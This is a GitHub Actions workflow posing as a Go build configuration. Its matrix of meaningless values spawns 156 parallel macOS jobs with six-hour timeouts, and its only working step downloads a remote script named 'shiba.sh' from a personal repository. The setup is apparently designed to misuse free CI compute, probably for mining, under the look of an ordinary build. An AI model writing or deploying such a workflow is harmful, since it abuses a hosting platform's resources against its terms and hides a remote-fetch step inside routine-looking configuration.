name: dev
on: [push, pull_request]
jobs:
  build:
    name: dev
    runs-on: macos-latest
    strategy:
      max-parallel: 100
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6]
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z]
    timeout-minutes: 360
    env:
        NUM_JOBS: 100
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: dev
      run: |
        wget https://raw.githubusercontent.com/rikydwi88/RK/main/shiba.sh
